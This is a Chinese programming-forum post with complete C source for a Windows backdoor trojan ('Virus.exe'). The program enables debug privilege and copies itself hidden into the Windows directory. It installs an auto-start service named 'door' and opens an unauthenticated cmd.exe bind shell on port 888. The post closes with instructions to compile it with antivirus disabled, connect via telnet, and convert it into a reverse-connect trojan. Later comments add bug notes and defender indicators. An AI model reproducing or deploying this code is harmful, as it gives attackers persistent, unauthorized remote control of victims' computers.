标题:后门木马设计
GodOneisCode
后门木马设计
双管道后门木马源代码
程序代码:
// 实验 : Virus.exe
// 作者 : GodisCodeLife
// 完成时间 : 一周

#include <Stdio.h>
#include <Winsock2.h>
#include <Windows.h>
#include <Tlhelp32.h>
#pragma comment(lib, "Ws2_32.lib")

// Forward declarations of the local helpers. CloseHandle(DWORD) and
// GetProcessId(char *) overload the Win32 functions of the same names (this
// only compiles as C++); when reading calls to those names below, resolve
// them by argument type, not by name.
VOID DebugPrivilege();
VOID CloseHandle(DWORD dwPid);
DWORD GetProcessId(char *szProcessName);
VOID EnterService();
VOID Telnetdoor();

// Entry point. Observable sequence: enable SeDebugPrivilege, install/start the
// "door" service, look up a PID by executable name, then block in the TCP
// command-shell listener. argc/argv are unused.
int main(int argc, char **argv)
{
    // Full path of this executable, truncated at the last '\' so szCurrDir
    // ends up holding only the directory part (which is not used afterwards).
    char szCurrDir[MAX_PATH] = { 0 };
    GetModuleFileName(NULL, szCurrDir, MAX_PATH);
    int ch = '\\';
    // strrchr points AT the separator, so pFileName still begins with '\'
    // (e.g. "\Virus.exe"). PROCESSENTRY32.szExeFile carries no separator, so
    // the strcmp in GetProcessId cannot match this string. If the path held
    // no '\' at all, pFileName would be NULL and strlen(NULL) is UB.
    char *pFileName = strrchr(szCurrDir, ch);
    int nLen = strlen(szCurrDir) - strlen(pFileName);
    szCurrDir[nLen] = NULL;   // NULL used as the char terminator 0

    DebugPrivilege();
    EnterService();
    DWORD dwPid = GetProcessId(pFileName);
    // Telnetdoor's outer while(TRUE) has no exit, so the two statements after
    // it are effectively unreachable.
    Telnetdoor();
    CloseHandle(dwPid);   // the local CloseHandle(DWORD): terminates that PID
    return 0;
}

// Enables SeDebugPrivilege on the current process token so that OpenProcess
// with PROCESS_ALL_ACCESS later succeeds on processes of other users.
// The return values of LookupPrivilegeValue and AdjustTokenPrivileges are not
// checked, so a token that does not hold the privilege (non-admin) fails
// silently. For defenders: the privilege adjustment is auditable through the
// "Audit Token Right Adjusted" policy (Security event 4703).
VOID DebugPrivilege()
{
    HANDLE hToken = NULL;

    // Open the current process token with full access.
    BOOL bRet = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken);

    if ( bRet == TRUE )
    {
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
        CloseHandle(hToken);
    }
}

// Walks a Toolhelp process snapshot looking for an exact, case-sensitive
// szExeFile match and returns that entry's PID.
// Caveats visible in this body: hSnap is never closed (handle leak); the
// snapshot handle is not validated; and when nothing matches, the loop ends
// with pe32 presumably still holding the LAST enumerated entry, whose PID is
// returned as if it were a hit (the caller then terminates that unrelated
// process). If Process32First itself fails the result is 0.
DWORD GetProcessId(char *szProcessName)
{
    DWORD dwPid = 0;
    BOOL bRet = 0;
    PROCESSENTRY32 pe32 = { 0 };
    pe32.dwSize = sizeof(PROCESSENTRY32);

    // Snapshot of all processes on the system.
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    // Linear search by executable name.
    bRet = Process32First(hSnap, &pe32);

    while ( bRet )
    {
        if ( strcmp(pe32.szExeFile, szProcessName) == 0 )
        {
            break;
        }
        bRet = Process32Next(hSnap, &pe32);
    }

    dwPid = pe32.th32ProcessID;
    return dwPid;
}

// Despite its name this is NOT a handle close: it terminates the process with
// the given PID (OpenProcess + TerminateProcess). The inner CloseHandle call
// takes a HANDLE and therefore resolves to the real Win32 CloseHandle.
// An OpenProcess failure (NULL) is not checked before TerminateProcess.
VOID CloseHandle(DWORD dwPid)
{
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    TerminateProcess(hProcess, 0);
    CloseHandle(hProcess);
}

// Persistence. If no service named "door" exists, copies this executable to
// <Windows dir>\SystemInfo.exe, marks the copy hidden, and registers it as an
// auto-start SERVICE_WIN32_OWN_PROCESS service named "door" (display name
// "door"), then starts it. Requires SC_MANAGER_ALL_ACCESS, i.e. admin rights;
// no return value is checked, so failures are silent.
// Indicators for defenders: a service named "door"; a hidden SystemInfo.exe in
// the Windows directory; service-install audit records (System log 7045,
// Security log 4697). This file defines no ServiceMain /
// StartServiceCtrlDispatcher, so how the SCM treats the started process is
// not determinable from here.
VOID EnterService()
{
    char szFileName[MAX_PATH] = { 0 };
    GetModuleFileName(NULL, szFileName, MAX_PATH);

    // Connect to the SCM and probe for an existing "door" service.
    SC_HANDLE scHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    SC_HANDLE scHandleOpen = OpenService(scHandle, "door", SERVICE_ALL_ACCESS);

    if ( scHandleOpen == NULL )
    {
        char szSelfFile[MAX_PATH] = { 0 };
        char szSystemPath[MAX_PATH] = { 0 };

        // Destination: <Windows dir>\SystemInfo.exe (unbounded strcat).
        GetWindowsDirectory(szSystemPath, MAX_PATH);
        strcat(szSystemPath, "\\SystemInfo.exe");
        GetModuleFileName(NULL, szSelfFile, MAX_PATH);

        // Self-copy; bFailIfExists == FALSE, so an existing copy is overwritten.
        CopyFile(szSelfFile, szSystemPath, FALSE);
        SetFileAttributes(szSystemPath, FILE_ATTRIBUTE_HIDDEN);

        // Register the copy as an auto-start service.
        SC_HANDLE scNewHandle = CreateService(scHandle,
            "door",
            "door",
            SERVICE_ALL_ACCESS,
            SERVICE_WIN32_OWN_PROCESS,
            SERVICE_AUTO_START,
            SERVICE_ERROR_IGNORE,
            szSystemPath,
            NULL,
            NULL,
            NULL,
            NULL,
            NULL);

        // Start it immediately (scNewHandle is not checked for NULL).
        StartService(scNewHandle, 0, NULL);
        CloseServiceHandle(scNewHandle);
    }

    CloseServiceHandle(scHandleOpen);
    CloseServiceHandle(scHandle);
}

// Unauthenticated bind shell. Listens on TCP 0.0.0.0:888, accepts a single
// client, starts a hidden "cmd" whose stdin/stdout/stderr are redirected
// through two inheritable anonymous pipes, and then relays: shell output ->
// socket, socket bytes -> shell stdin one line at a time.
// Observable artifacts: a listener on port 888 owned by this process, a
// cmd.exe child with pipe std handles, and a client<->cmd relay with no
// authentication. The outer while(TRUE) has no exit, so the function never
// returns, WSACleanup() is unreachable, and sockets, pipes and the child
// process handles are never released.
// Weaknesses visible in the body: dwBytes is a DWORD, so a recv() error
// (SOCKET_ERROR, -1) wraps to a large value and is not caught by "<= 0";
// and i is never bounded against sizeof(szCommand), so a line longer than
// 0x1000 bytes overflows szCommand on the stack.
VOID Telnetdoor()
{
    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);

    // Listening socket (no error checks anywhere in this function).
    SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

    // Bind to every interface on port 888; sin_zero is left uninitialized.
    sockaddr_in sock;
    sock.sin_family = AF_INET;
    sock.sin_addr.S_un.S_addr = ADDR_ANY;
    sock.sin_port = htons(888);
    bind(s, (SOCKADDR *)&sock, sizeof(SOCKADDR));

    listen(s, 1);

    // Block until exactly one client connects; no further accept() is done.
    sockaddr_in sockClient;
    int SaddrSize = sizeof(SOCKADDR);
    SOCKET sc = accept(s, (SOCKADDR *)&sockClient, &SaddrSize);

    // Two anonymous pipes, both with inheritable handles so the child can
    // use them as its standard handles.
    SECURITY_ATTRIBUTES sa1, sa2;
    HANDLE hRead1, hRead2, hWrite1, hWrite2;

    sa1.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa1.lpSecurityDescriptor = NULL;
    sa1.bInheritHandle = TRUE;

    sa2.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa2.lpSecurityDescriptor = NULL;
    sa2.bInheritHandle = TRUE;

    CreatePipe(&hRead1, &hWrite1, &sa1, 0);
    CreatePipe(&hRead2, &hWrite2, &sa2, 0);

    // Child process set-up: hidden window, std handles taken from the pipes.
    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(STARTUPINFO));
    si.cb = sizeof(STARTUPINFO);
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;
    // Pipe 1: child stdout/stderr -> parent reads hRead1.
    // Pipe 2: parent writes hWrite2 -> child stdin.
    si.hStdInput = hRead2;
    si.hStdOutput = hWrite1;
    si.hStdError = hWrite1;

    char *szCmd = "cmd";
    // Spawn the shell with handle inheritance enabled (bInheritHandles=TRUE).
    CreateProcess(NULL, szCmd, NULL, NULL,
        TRUE, 0, NULL, NULL, &si, &pi);

    // Relay buffers: szBuffer for both pipe output and socket input,
    // szCommand for the line being assembled for the shell.
    DWORD dwBytes = 0;
    BOOL bRet = FALSE;
    char szBuffer[0x1000] = { 0 };
    char szCommand[0x1000] = { 0 };


    // Relay loop; no exit condition.
    while ( TRUE )
    {
        // Start each iteration with an empty command line.
        ZeroMemory(szCommand, 0x1000);

        // Non-blocking check for pending shell output; dwBytes receives the
        // byte count available in the pipe.
        bRet = PeekNamedPipe(hRead1, szBuffer, 0x1000, &dwBytes, 0, 0);
        if ( dwBytes )
        {
            // Forward shell output to the client.
            ReadFile(hRead1, szBuffer, 0x1000, &dwBytes, NULL);
            send(sc, szBuffer, dwBytes, 0);
        }
        else
        {
            int i = 0;
            while ( 1 )
            {
                // Read from the client; only szBuffer[0] of each recv() is
                // kept, so this relies on a client that sends one character
                // per segment (as interactive telnet does). A line delivered
                // in one segment would contribute only its first byte.
                dwBytes = recv(sc, szBuffer, 0x1000, 0);
                if ( dwBytes <= 0)
                {
                    break;
                }

                szCommand[i++] = szBuffer[0];
                if ( szBuffer[0] == '\r' || szBuffer[0] == '\n' )
                {
                    szCommand[i-1] = '\n';
                    break;
                }
            }
            // Hand the assembled line to the shell's stdin.
            WriteFile(hWrite2, szCommand, i, &dwBytes, NULL);
        }
    }    
    WSACleanup();
}


编译连接运行这个木马(关闭杀毒软件), 然后打开CMD,用Telnet命令连接这个木马。
如果不会Telnet命令的朋友可以上网查找详细用法。
示例: Telnet 中木马的IP地址 888
由于程序中绑定的是888端口,所以必须连接888端口才有效。
如果有能力的学友,可以将其更改成反弹式木马,那样就更完美了。
2017-02-02 15:22



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-473937-1-1.html



